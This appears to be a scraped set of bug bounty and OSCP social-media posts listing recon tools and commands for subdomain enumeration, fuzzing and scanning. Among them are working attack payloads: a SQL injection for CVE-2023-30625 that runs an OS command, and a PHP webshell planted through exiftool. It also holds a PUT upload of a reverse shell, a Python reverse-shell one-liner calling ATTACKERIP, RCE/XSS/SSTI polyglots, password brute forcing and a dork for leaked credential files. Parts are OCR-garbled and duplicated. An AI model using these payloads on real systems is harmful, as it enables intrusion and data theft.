Bug bounty Tips

Rudder Server < 1.3.0-rc.1 - SQL Injection cve-2023-30625 POST /v1/warehouse/pending-events HTTP/1.1 Host: {{Hostname}} {"source_id": "test'; copy (SELECT '') to program 'id'-- - "}

✔️ Complete Bug Bounty tool List ✊ Enjoy :) dnscan https://github.com/rbsec/dnscan Knockpy https://github.com/guelfoweb/knock Sublist3r https://github.com/aboul3la/Sublist3r massdns https://github.com/blechschmidt/massdns nmap https://nmap.org masscan https://github.com/robertdavidgraham/masscan EyeWitness https://github.com/ChrisTruncer/EyeWitness DirBuster https://sourceforge.net/projects/dirbuster/ dirsearch https://github.com/maurosoria/dirsearch Gitrob https://github.com/michenriksen/gitrob git-secrets https://github.com/awslabs/git-secrets sandcastle https://github.com/yasinS/sandcastle bucket_finder https://digi.ninja/projects/bucket_finder.php GoogD0rker https://github.com/ZephrFish/GoogD0rker/ Wayback Machine https://web.archive.org waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050 Sn1per https://github.com/1N3/Sn1per/ XRay https://github.com/evilsocket/xray wfuzz https://github.com/xmendez/wfuzz/ patator https://github.com/lanjelot/patator datasploit https://github.com/DataSploit/datasploit hydra https://github.com/vanhauser-thc/thc-hydra changeme https://github.com/ztgrace/changeme MobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/ Apktool https://github.com/iBotPeaches/Apktool dex2jar https://sourceforge.net/projects/dex2jar/ sqlmap http://sqlmap.org/ oxml_xxe https://github.com/BuffaloWill/oxml_xxe/ XXE Injector https://github.com/enjoiz/XXEinjector The JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool ground-control https://github.com/jobertabma/ground-control ssrfDetector https://github.com/JacobReynolds/ssrfDetector LFISuit https://github.com/D35m0nd142/LFISuite GitTools https://github.com/internetwache/GitTools dvcs-ripper https://github.com/kost/dvcs-ripper tko-subs https://github.com/anshumanbh/tko-subs HostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcer Race the Web https://github.com/insp3ctre/race-the-web ysoserial https://github.com/GoSecure/ysoserial PHPGGC https://github.com/ambionics/phpggc CORStest https://github.com/RUB-NDS/CORStest Retire-js https://github.com/RetireJS/retire.js getsploit https://github.com/vulnersCom/getsploit Findsploit https://github.com/1N3/Findsploit bfac https://github.com/mazen160/bfac WPScan https://wpscan.org/ CMSMap https://github.com/Dionach/CMSmap Amass https://github.com/OWASP/Amass Extra Tools http://projectdiscovery.io

Step 1: Subdomain Enumeration •DNS Dumpster •Sublist3r •Amass •Google Dorking •Certificate Transparency Logs •subdomainer Step 2: Find Live Domains cat all-domains.txt | httpx > all-live.txt Step 3: Identify All URLs cat all-live.txt | gauplus -subs -b png,jpg,gif,jpeg,swf,woff,gif,svg -o allUrls.txt Step 4: Injection Burp Collaborator URL in Parameters cat /home/casperino/tools/nuclei/httpx.txt | grep "=" | ./qsreplace 40ga7gynfy6pcg06ov.oastify.com > ssrf.txt Step 5: Test for SSRF Vulnerabilities cat ssrf.txt | httpx -fr Step 6: How to check which URL is vulnerable split -l 10 ssrf.txt output_file_

Guys I am planning a free workshop on this Sunday, which topic should I choose

cat httpx.txt | aquatone -scan-timeout 3000 -threads 5 -silent -screenshot-timeout 50000 -http-timeout 20000 -out screenshots-folder echo "domain" | waybackurls "$line" | sudo ./qsreplace | grep --color=auto "=" | parallel -j50 -q curl -Isk --max-time 2 -w '%{url_effective}' | grep --color=auto -iE "Location" | sed -e 's!Location:!!' | sudo httpx -status-code; done

sudo dirsearch -u "target.com" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x 403 sudo dirsearch -u "target.com/access/reset" "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiI5NjgxODU2NS04ZDlmLTRkMTQtOGNlMi1iYzgwYzE5ZWFlZWQiLCJhdWQiOiJBQ0NFUYtZjY0MmRkY2U0MzY0In0sImV4cCI6MTcwNjI1NTM2OX0.mJafEz4lSaB1gi-o58_BHdqA2gm0pIWPLlMq1ga4pdw" -x 403 sudo dirsearch -u "target.com" -w /home/SecLists-master/Discovery/Web-Content/common.txt -r -x 403 -o dir.txt **Content Discovery Introduction to FFUF ffuf -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/raft-large-words.txt -u https://targetcom/d/setting/FUZZ -t 50 -ac -c ffuf -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/raft-large-words.txt -u www.target[].com/FUZZ -t 75 ffuf -u "https://target[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -o ffuf.txt └─$ python3 ffuf-json.py ffuf -u "https://target[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt | tee dir.txt ffuf -u "https://target[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -fs 162,0 ffuf -u "https://target[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -fs 162,0 -mc all ffuf -u "https://ftarget[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -fs 162,0 -mc all -fc 404 ffuf -u "target.target[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -ac ffuf -u "https://target[].com/FUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -ac -fs 0 -fl 1 ffuf -u "https://target][.com/access/reset/FUZZUser" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt ffuf -u "https://target[].com/access/resetFUZZ" -w /home/casperino/Documents/SecLists-master/Discovery/Web-Content/common.txt -fc 403 ffuf -u "target.com/access/reset/F…" -w /home/SecLists-master/Discovery/Web-Content/common.txt -H "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiI5NjgxODU2NS04ZDlmLTRkMTQtOGNlMi1iYzgwYzE5ZWFlZWQiLCJhdWQiOiJBQ0NFU1MiLCJpc3MiOiJBQ0NFU1MiLCJwYXlsb2FkIjp7ImxvZ2luIjpudfdXNlcm5hbWUiOm51bGwsImxhc3Rfc2F2ZWRfdXNlcm5hbWUiOm51bGwsImNvcnJlbGF0aW9uX2lkIjoiZjdlMjQ4ZjAtNDY3ZS00OTA5LTg2YWYtZjY0MmRkY2U0MzY0In0sImV4cCI6MTcwNjI1NTM2OX0.mJafEz4lSaB1gi-o58_BHdqA2gm0pIWPLlMq1ga4pdw" -H "Test:admin" Passive Enumeration GetAllUrls echo "https://target][.com" | gau echo "target.target[.[com/access/reset" | gau > gau.txt sudo echo "target.com" | getallurls | sort -u | grep -v www > gau.txt Not get duplicate cat gau.txt | grep “=” | sort -u Passive Enumeration Waybackurls sudo echo "www.target[].com" | waybackurls > gau.txt echo "https://target.[]com" | gau > gau.txt && sudo echo "target.com" | waybackurls > way.txt && cat gau.txt | grep “=” | sort -u > sorted.txt katana -u "https://uber.onelogin[].com/" -jc -d 4 -o katana-ube.txt python3 cloudflair.py glassdoor.[]com Single URL: echo https://google.[]com | hakrawler Multiple URLs: cat urls.txt | hakrawler Timeout for each line of stdin after 5 seconds: cat urls.txt | hakrawler -timeout 5 Send all requests through a proxy: cat urls.txt | hakrawler -proxy http://localhost:8080 echo https://google.[]com | hakrawler -subs echo google.][com | haktrails subdomains | httpx | hakrawler echo www.google.][com | docker run --rm -i hakluke/hakrawler:v2 -subs echo www.google.[com | docker run --rm -i hakluke/hakrawler -subs pripshttps://www.google.][comoriginfinder -h https://example.][]com:443/foo $ prips 1.1.1.0/24 | hakoriginfinder -h one.one.one.one[]:80/index.html -p 80,443,8080,8443 xnLinkFinder python3 xnLinkFinder.py -i redbull.com -sp redbull.com -sf rebbull.* -d 3 | unfurl keys | sort -u

🚀🚀DISCOVERING DOMAIN🔥🔥🔥🔥 #DAY11 Look for Asn!!! bgp.he.net/search?search%… dnslytics.com/dns-lookup whoxy.com AMASS sudo amass enum -brute -d www.targett[].mil -o target.txt -p 80,443,8080,8443,8000 sudo amass enum -active -brute -d www.targett[].mil -o targett.mil.txt -p 80,443,8080,8443,8000 amass enum -v -src -ip -brute -min-for-recursive 2 -d targett.com ----------------------------------------------------------------- *amass asn amass intel -org “TARGET” -v amass intel -asn 205952 -o ans.txt -v amass enum -d targett.]com -o ubesubdoamin.txt -v hunting - Subdomain Enumeration Subfinder subfinder -d targett.]com -o domain.txt subfinder -d targett.]com -sources securitytrails *for look how many domain wc domain.txt *Subdomain Enumeration AMASS cat amass_subdomains.txt | grep “targett.]com” cat amass_subdomains.txt | grep -o “targett.]com” cat ssrf-uber1.txt | grep -Eo "([a-zA-Z0-9.-]+\.)*uber\.com" cat amass_subdomains.txt | grep -Eo “([a-zA-Z0-9.-]+\.)*hackerone\.com" *Subdomain Enumeration Bruteforcing /usr/share/seclists/Discovery/DNS /home/casperino/Desktop/best-dns-wordlist.txt *Subdomain Bruteforcing FFuF ffuf -u "http://FUZZ.targett.]com" -w /home/Desktop/best-dns-wordlist.txt -t 50 gobuster dns -d targett.]com -w /home/Desktop/best-dns-wordlist.txt *Subdomain Bruteforcing GoBuster gobuster dns -d targett.]com -w /home/Desktop/best-dns-wordlist.txt Subdomain Bruteforcing AMASS amass enum -d targett.]com -brute -w /home/Desktop/best-dns-wordlist.txt -v *Subdomain Bruteforcing PureDNS puredns bruteforce /home/Desktop/best-dns-wordlist.txt targett.]com --resolvers resolvers.txt *Subdomain Enumeration VHOST sudo nano /etc/hosts 192.168.1.1 targett.com ffuf -u "targett.com" -H "Host: FUZZ.targett.com" -w /home/Desktop/best-dns-wordlist.txt *Combining Tools amass enum -d targett.com -o amass.txt -nocolor -v cat amass.txt | grep -Eo "([a-zA-Z0-9.-]+\.)*sony\.com" cat amass.txt | grep -Eo "([a-zA-Z0-9.-]+\.)*sony\.com" > amass_new_.txt 3-sudo bash -c "cat amass.txt | grep -Eo '([a-zA-Z0-9.-]+\.)*sony\.com' > amass_new_.txt" subfinder -d targett.com -o subfinder.txt -v cat amass_new.txt subfinder.txt | sort -u > sorted.txt 5-sudo bash -c "cat amass_new_.txt subfinder.txt | sort -u > sorted.txt" cat amass_new_.txt subfinder.txt > new.txt 6-sudo bash -c "cat amass_new_.txt subfinder.txt > new.txt" wc new.txt wc sorted.txt amass enum -d targett.com -o amass.txt -nocolor -v | grep -Eo "([a-zA-Z0-9.-]+\.)*sony\.com" > amass2.txt && subfinder -d targett.com -o subfinder.txt && cat amass2.txt subfinder.txt | sort -u > sorted.txt sudo bash -c "amass enum -d tagett.com -o amass.txt -nocolor -v | grep -Eo '([a-zA-Z0-9.-]+\.)*sony\.com' > amass2.txt && subfinder -d tagett.com -o subfinder.txt && cat amass2.txt subfinder.txt | sort -u > sorted.txt" amass enum -d targett.com -o amass.txt -nocolor -v && subfinder -d targett.com -o subfinder.txt && cat amass.txt subfinder.txt | sort -u > sorted.txt *Filtering Live DomainsSubdomains cat subdomain2.txt | httpx -o http.txt cat subdomain2.txt | httpx -o http.txt -tittle **Finding Origin IP Address 1 only with cloudflare search.censys.io/hosts/34.120.2… ping bepractical.tech whois bepractical.tech python3 cloudflair.py bepractical.tech ***Finding Origin IP Address 2 securitytrails.com/domain/www.air… ***Port Scanning with NMAP sudo nmap -sF sudo nmap -sN -sS -vv nmap -iL mil-domains.txt -p80,443,8080,8000,8443,1000 sudo nmap -sV -sC -p- 154.56.61.191 -vv sudo nmap -sV -sC -p- 154.56.61.191 -vv -T 5 ***Vulnerability Scanning with NMAP sudo nmap -sV -sC -p 80 154.56.61.191 --script=vuln -vv -T 5 nmap --script vulners -sV 192.168.0.0 **Port Scanning with NAABU naabu -l subfinder.txt -o port.txt -top-ports -v **Content Discovery Basics of Dirsearch sudo dirsearch -u "target.com" sudo dirsearch -u "target.com" -x 403,301 sudo dirsearch -u "target.com" --exclude-status=403,401

50 gobuster dns -d targett.]com -w /home/Desktop/best-dns-wordlist.txt *Subdomain Bruteforcing GoBuster gobuster dns -d targett.]com -w /home/Desktop/best-dns-wordlist.txt Subdomain Bruteforcing AMASS amass enum -d targett.]com -brute -w /home/Desktop/best-dns-wordlist.txt -v *Subdomain Bruteforcing PureDNS puredns bruteforce /home/Desktop/best-dns-wordlist.txt targett.]com --resolvers resolvers.txt *Subdomain Enumeration VHOST sudo nano /etc/hosts 192.168.1.1 targett.com ffuf -u "targett.com" -H "Host: FUZZ.targett.com" -w /home/Desktop/best-dns-wordlist.txt *Combining Tools amass enum -d targett.com -o amass.txt -nocolor -v cat amass.txt | grep -Eo "([a-zA-Z0-9.-]+\.)*sony\.com" cat amass.txt | grep -Eo "([a-zA-Z0-9.-]+\.)*sony\.com" > amass_new_.txt 3-sudo bash -c "cat amass.txt | grep -Eo '([a-zA-Z0-9.-]+\.)*sony\.com' > amass_new_.txt" subfinder -d targett.com -o subfinder.txt -v cat amass_new.txt subfinder.txt | sort -u > sorted.txt 5-sudo bash -c "cat amass_new_.txt subfinder.txt | sort -u > sorted.txt" cat amass_new_.txt subfinder.txt > new.txt 6-sudo bash -c "cat amass_new_.txt subfinder.txt > new.txt" wc new.txt wc sorted.txt amass enum -d targett.com -o amass.txt -nocolor -v | grep -Eo "([a-zA-Z0-9.-]+\.)*sony\.com" > amass2.txt && subfinder -d targett.com -o subfinder.txt && cat amass2.txt subfinder.txt | sort -u > sorted.txt sudo bash -c "amass enum -d tagett.com -o amass.txt -nocolor -v | grep -Eo '([a-zA-Z0-9.-]+\.)*sony\.com' > amass2.txt && subfinder -d tagett.com -o subfinder.txt && cat amass2.txt subfinder.txt | sort -u

💫 CipherOps said YES to our journey together! Embarking on a path filled with innovation, growth, and shared success. ❤️🚀 #DreamsComeTrue"

grep -o '^[^#]*' file.txt | awk -F' ' '{print $2}' | sed -e 's/^[^.]*\.//'

Program has "All in scope" in their policy? Use this checklist 📋 to collect list of root domains: ✅ Inspect the footer of their pages. Sometimes companies like to use same footer across their all domains. For example: "© 2024 The Coca‑Cola Company. All rights reserved." could be used as "The Coca‑Cola Company. All rights reserved." dork on Google! ✅ Check the organisation name on the SSL certificate. Copy it to http://crt.sh and shodan. For example to query "The Coca‑Cola Company" via http://crt.sh CLI: curl -s "https://crt.sh/?q=The+Coca‑Cola+Company&output=json" | jq -r '.[] | .common_name' | sort -u NOTE: Some domains could be very old, outdated or already belong to other company, so make sure to inspect them manually. ✅ For shodan, use org:"The Coca‑Cola Company" or ssl:http://coca-colacompany.com to check the assets. Inspect the hostnames on shodan query response and collect them to your list. ✅ For FOFA https://en.fofa.info, place the company name in the search bar, as for example - "The Coca‑Cola Company". Select the favicons, of your company and filter the results. You could also copy those favicon values to shodan search and use favicon:"<value>" as the shodan dork. #BugBounty #bugbountytip #itsecurity

🚀 Exciting News! 🚀 I've just conquered the Twister machine in my OSCP journey! #Day7🕵️‍♂️💻 👨‍💻 Now, I'm sharing my code and notes to help You!!🎯 🔗 Check out ==-Nmap==== nmap -p- -sT -sV -A $IP nmap -p- -sC -sV $IP --0pen nmap -p- --script=vuln $IP ###HTTP-Methods nmap --script http-methods --script-args http-methods. url-path='/webs ite ' ### sed IPs: grep -oE '((1? [0-9] [0-9]? |2[0-4] [0- 9] |25[0-5])\.){3} (1? [0-9] [0-9]? |2 [0-4] [0-9] |25 [0-5] ) ' FILE --Script smb-enum-shares =EE======= =E==EE====E============E== EEE=E==E==: =========: == WPScan & SSL wpscan--url $URL --disable-tls-checks - -enumerate p --enumerate t --enumerate u ===WPScan Brute Forceing: wpscan --url $URL --disable-t ls-checks - U users -P /usr/share/wordlists/ rockyou. txt ==Aggressive Plugin Detection: wpscan --url $URL plugins-detection aggressive --enumerate p ======================================== c==Nikto with SSL and Evasion nikto --host $IP -ssl -evasion 1 SEE EVASION MODALITIES. E=================================== ==dns_recon dnsrecon -d yourdomain. com == ===9obuster directory gobuster dir -u $URL -W /opt/SecLists/Dis covery/Web- Content/ raft-medium-directories. txt -k - t 30 ===gobuster files gobuster dir -u $URL -W /opt/SecLists/Dis covery/Web- Content/raft-medium-files. txt -k -t 30 ==00buster for SubDoma in brute forcing: gobuster dns -d doma in.org -w /opt/SecLists/Discovery/DNS/subdomains- toplmillion-110000. txt -t 30 "just make sure any DNS name you find resolves to an in-scope address before you test it! ====E=======: =H==E====E====E===E==== ==Extract IPs from a text file. grep -o '[0-9]\{1, 3\}\. [0-9]\{1,3\}\. [0- 9]\{1,3\}\. [0-9]\{1, 3\}' nmapfile. txt ===Wfuzz XSS Fuzzing===: wfuzz -C -Z file, /opt/SecLists/Fuzzing/XSS,/XSS- BruteLogic. txt "$URL" wfuzz -C -Z file, /opt/SecLists/ Fuzzing/XSS,/XSS- JhaddiX. txt "$URL" ===C0MMAND INJECTION WITH POST DATA wfuzz -C -Z file, /opt/SecLists/Fuzzing/command- injection-commix. txt -d "doi=FUZZ" "$URL" ===Test for Paramter Existence! wfuzz -C -Z file, /opt/SecLists/Dis covery /Web- Content/burp-parameter-names. txt "$URL" ===AUTHENTICATED FUZZING DIRECTORIES: wfuzz -C -Z file, /opt/SecLists/Dis cove ry/Web- Content/ raft-medium-directories . txt --hc 404 -d "SESSIONID=value" "$URL" =AUTHENTICATED FILE FUZZING: wfuzz -C -Z file, /opt/SecLists/Discove ry/Web- Content/ raft-med ium-files . txt --hc 404 - d "SESSIONID=value" "$URL" ===FUZZ Directories : wfuzz -C -Z file, /opt/SecLists/Dis covery/Web- Content/ raft-la rge-d irectories. txt --hc 404 "$URL" ===FUZZ FILES: wfuzz -C -Z file, /opt/SecLists/Dis covery/Web- Content/ raft-la rge-files . txt --hc 404 "$URL" 📚 Learn, practice, and let's achieve OSCP success together! 💪🏆 #OSCP #Cybersecurity #EthicalHacking #TwisterMachine #InfoSec #GitHub #LearnToHack @SaveToNotion @threadreaderapp 🔍 Searching for sensitive files on the web? Here's a Google dork to find filenames that might contain sensitive information. Use it responsibly! #InfoSec #Security #GoogleDork #bugbountytips @SaveToNotion @threadreaderapp 🔍Google dork for searching these filenames on Google: intext:"filename:config.php" OR intext:"filename:config.inc.php" OR intext:"filename:prod.secret.exs" OR intext:"filename:configuration.php" OR intext:"filename:.sh_history" OR intext:"filename:shadow" OR intext:"filename:proftpdpasswd" OR intext:"filename:.psafe3" OR intext:"filename:.pgpass" OR intext:"filename:manifest.xml" OR intext:"filename:travis.yml" OR intext:"filename:vim_settings.xml" OR intext:"filename:database" OR intext:"filename:prod.exs" OR intext:"filename:prod.secret.exs" OR intext:"filename:.npmrc _auth" OR intext:"filename:.dockercfg" OR intext:"filename:WebServers.xml" OR intext:"filename:.bash_history" OR intext:"filename:sftp-config.json" OR intext:"filename:sftp.json" OR intext:"filename:secrets.yml" OR intext:"filename:.esmtprc" OR

My own discussion channel do join https://t.me/bug_hunting_talks

400 followers for today ❤️❤️🥳🥳🥳

🚀🤌Bug Bounty Tips!!!🔥🔥 Quick tricks `bash # Web ports for nmap 80,81,300,443,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5800,6543,7000,7396,7474,8000,8001,8008,8014,8042,8069,8080,8081,8083,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9043,9060,9080,9090,9091,9200,9443,9800,9981,10000,11371,12443,16080,18091,18092,20720,55672 # Technology scanner # github.com/urbanadventure… whatweb htttps://url.com # Screenshot web # github.com/maaaaz/webscre… # github.com/sensepost/gowi… # github.com/michenriksen/a… # Get error with in input %E2%A0%80%0A%E2%A0%80 # Retrieve additional info: /favicon.ico/..%2f /lol.png%23 /../../../ ?debug=1 /server-status /files/..%2f..%2f # Change default header to accept */* Accept: application/json, text/javascript, */*; q=0.01 # Sitemap to wordlist (httpie) http target.com/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g' > wordlist_endpoints.txt # Bypass Rate Limits: # Use different params: sign-up, Sign-up, SignUp # Null byte on params: %00, %0d%0a, %09, %0C, %20, %0 # Bypass upload restrictions: # Change extension: .pHp3 or pHp3.jpg # Modify mimetype: Content-type: image/jpeg # Bypass getimagesize(): exiftool -Comment='"; system($_GET['cmd']); ?>' file.jpg # Add gif header: GIF89a; # All at the same time. # ImageTragic (memory leaks in gif preview) # github.com/neex/gifoeb ./gifoeb gen 512x512 dump.gif # Upload dump.gif multiple times, check if preview changes. # Check docs for exploiting # If upload from web is allowed or : # medium.com/@shahjerry33/p… # iplogger.org/invisible/ # iplogger.org/15bZ87 # Check HTTP options: # Check if it is possible to upload curl -v -k -X OPTIONS https://10.11.1.111/ # If put enabled, upload: curl -v -X PUT -d '' http://10.11.1.111/test/shell.php nmap -p 80 192.168.1.124 --script http-put --script-args http-put.url='/test/rootme.php',http-put.file='/root/php-reverse-shell.php' curl -v -X PUT -d '' http://VICTIMIP/test/cmd.php && http://VICTIMIP/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22ATTACKERIP%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27 curl -i -X PUT -H “Content-Type: text/plain; charset=utf-8” -d “/root/Desktop/meterpreter.php” http://VICTIMIP:8585/uploads/meterpreter.php # If PUT is not allowed, try to override: X-HTTP-Method-Override: PUT X-Method-Override: PUT # Retrieve endpoints # LinkFinder # github.com/GerbenJavado/L… python linkfinder.py -i example.com -d python linkfinder.py -i burpfile -b # Retreive hidden parameters # Tools # github.com/s0md3v/Arjun python3 arjun.py -u url.com --get python3 arjun.py -u url.com --post # github.com/maK-/parameth python parameth.py -u example.com/test.php # github.com/devanshbatham/… python3 paramspider.py --domain example.com # github.com/s0md3v/Parth python3 parth.py -t example.com # .DS_Store files? # github.com/gehaxelt/Pytho… python main.py samples/.DS_Store.ctf # Polyglot RCE payload 1;sleep${IFS}9;#${IFS}’;sleep${IFS}9;#${IFS}”;sleep${IFS}9;#${IFS} # Nmap web scan nmap --script "http-*" example.com -p 443 # SQLi + XSS + SSTI '"><svg/onload=prompt(5);>{{7*7}} ' ==> for Sql injection "><svg/onload=prompt(5);> ==> for XSS {{7*7}} ==> for SSTI/CSTI # Try to connect with netcat to port 80 nc -v host 80 # Understand URL params with unfurl dfir.blog/unfurl/